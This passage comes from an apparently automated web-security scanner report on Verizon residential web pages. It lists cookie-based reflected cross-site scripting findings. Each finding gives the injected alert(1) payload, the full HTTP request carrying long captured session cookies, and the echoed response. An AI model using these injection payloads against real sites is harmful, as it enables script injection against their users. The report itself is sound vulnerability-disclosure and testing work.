Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=1f41c"-alert(1)-"037c2ee7a79; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 83946
Expires: Sat, 20 Nov 2010 02:53:21 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:53:21 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:53:21 GMT; path=/
Set-Cookie: ContextInfo_State=TX; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:53:21 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:53:21 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:53:21 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<script type="text/javascript">
function startmenu()
{
}
var mvzOptIn="N";
var strdotcomval = "1f41c"-alert(1)-"037c2ee7a79"
if(mvzOptIn != 'Y' || strdotcomval == "")
{
    var m_view = new VZT.MasterNavView();
    var m_model = {container: document.getElementB
...[SNIP]...

3.296. https://www22.verizon.com/Residential/aboutFiOS/reviews/reviews.htm [VzApps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /Residential/aboutFiOS/reviews/reviews.htm

Issue detail

The value of the VzApps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 90afa'><script>alert(1)</script>32063bb4fe6 was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/aboutFiOS/reviews/reviews.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX90afa'><script>alert(1)</script>32063bb4fe6; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 71887
Expires: Sat, 20 Nov 2010 02:54:03 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:54:03 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:54:03 GMT; path=/
Set-Cookie: ContextInfo_State=TX90afa'><script>alert(1)</script>32063bb4fe6; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:54:03 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:54:03 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:54:03 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX90AFA'><SCRIPT>ALERT(1)</SCRIPT>32063BB4FE6 ' />
...[SNIP]...

3.297. https://www22.verizon.com/Residential/aboutFiOS/reviews/reviews.htm [VzApps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /Residential/aboutFiOS/reviews/reviews.htm

Issue detail

The value of the VzApps cookie is copied into the HTML document as plain text between tags. The payload dc3af<script>alert(1)</script>751ce609535 was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/aboutFiOS/reviews/reviews.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TXdc3af<script>alert(1)</script>751ce609535; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 73425
Expires: Sat, 20 Nov 2010 02:54:07 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:54:07 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:54:07 GMT; path=/
Set-Cookie: ContextInfo_State=TXdc3af<script>alert(1)</script>751ce609535; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:54:07 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:54:07 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:54:07 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TXDC3AF<SCRIPT>ALERT(1)</SCRIPT>751CE609535 </DIV>
...[SNIP]...

3.298. https://www22.verizon.com/Residential/aboutFiOS/reviews/reviews.htm [dotcomsid cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /Residential/aboutFiOS/reviews/reviews.htm

Issue detail

The value of the dotcomsid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 48553"-alert(1)-"872a1235bd2 was submitted in the dotcomsid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Residential/aboutFiOS/reviews/reviews.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=48553"-alert(1)-"872a1235bd2; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 77665
Expires: Sat, 20 Nov 2010 02:53:58 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:53:58 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:53:58 GMT; path=/
Set-Cookie: ContextInfo_State=TX; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:53:58 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:53:58 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:53:58 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<script type="text/javascript">
function startmenu()
{
}
var mvzOptIn="N";
var strdotcomval = "48553"-alert(1)-"872a1235bd2"
if(mvzOptIn != 'Y' || strdotcomval == "")
{
    var m_view = new VZT.MasterNavView();
    var m_model = {container: document.getElementB
...[SNIP]...

3.299. https://www22.verizon.com/Residential/aboutFiOS/widgets/widgets.htm [VzApps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /Residential/aboutFiOS/widgets/widgets.htm

Issue detail

The value of the VzApps cookie is copied into the HTML document as plain text between tags. The payload 721a5<script>alert(1)</script>92d3aad9a2c was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/aboutFiOS/widgets/widgets.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
